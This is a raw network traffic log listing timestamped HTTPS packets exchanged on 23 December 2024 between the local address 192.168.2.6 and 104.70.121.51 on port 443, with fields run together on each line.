                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.539026976 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546120882 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546155930 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546170950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546184063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546222925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546237946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546268940 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546284914 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546447992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546463013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546475887 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556785107 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556809902 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556828022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556858063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556879997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556912899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556924105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557162046 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557184935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557198048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557209969 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562576056 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562608004 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562621117 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562733889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562803984 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562818050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562856913 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562980890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563106060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563118935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563132048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.570935011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.570955038 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.571191072 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.693022013 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.841545105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.008569956 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012254953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012559891 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012641907 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012660980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012674093 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012685061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012697935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012706995 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.035659075 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.349833012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.356657028 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.356987000 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357084990 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357098103 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357112885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357124090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357161045 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.387137890 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.387833118 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.696652889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613522053 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613533974 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613545895 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613718987 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613770008 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613781929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613794088 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.613928080 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.641156912 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.655041933 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.957143068 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.969769955 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.979538918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.979806900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.979851961 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.979865074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.979984999 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.980004072 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.980017900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:24.980211973 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:25.015871048 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:25.319097042 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.394356966 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.714155912 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.724937916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.724957943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.725075006 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.727905989 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:33.735621929 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.173518896 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.181720018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.181726933 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.181879997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.182132006 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.190331936 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.504458904 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.510020018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.510037899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.510096073 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.510478020 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.517453909 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.836170912 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.839710951 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.839718103 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.839723110 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.840116978 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:34.846863985 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.162265062 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.169272900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.169317961 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.169370890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.169620037 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.176702976 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.491091967 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.497870922 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.497951984 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.497962952 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.498411894 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.507214069 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.821629047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.828291893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.828306913 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.828502893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.829282999 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:35.839811087 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.154186010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.162812948 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.162959099 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.162969112 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.163331032 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.171442032 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.495033026 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.503684998 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.503806114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.503926039 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.504054070 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:36.511118889 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.218961000 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.219197989 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.225404024 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.540915966 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.546459913 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.546500921 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.546626091 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.546760082 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.553747892 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.868788004 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.876174927 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.876293898 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.876328945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.876471043 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:42.882711887 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.197292089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.204788923 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.204802036 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.204919100 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.205102921 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.211152077 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.549608946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.551415920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.551482916 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.551492929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.552726984 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.560403109 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.875318050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.882489920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.882678986 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.882822037 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.882836103 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.882847071 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:43.891488075 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.205805063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.212281942 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.212332010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.212342024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.212579012 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.220403910 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.534645081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.541285992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.541301012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.541372061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.541687012 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.549922943 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.866684914 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.873117924 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.873131990 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.873362064 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.873414993 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:44.882905006 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.248388052 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.256913900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.257040977 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.257106066 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.257258892 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.264456034 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.589019060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.598300934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.598679066 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.598781109 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.602658987 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:45.615619898 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.110297918 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.169239044 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.169519901 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.615835905 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.615849018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.616206884 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.622615099 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.622627020 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.622653961 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.622927904 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.630681038 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.945244074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:46.951983929 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.508328915 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.508436918 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.515789032 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.829765081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.837483883 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.837496042 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.837563038 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.837824106 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:52.844489098 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.158647060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.166301012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.166336060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.166347027 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.166650057 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.176207066 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.491161108 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.499341011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.499362946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.499382019 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.499936104 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.506416082 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.820975065 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.829499006 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.829556942 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.829592943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.829811096 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:53.835850954 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.153049946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.160178900 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.160191059 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.160306931 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.160525084 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.167104006 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.486928940 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.494895935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.495064020 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.495094061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.495357037 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.503119946 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:54.817940950 CET44352290104.70.121.51192.168.2.6
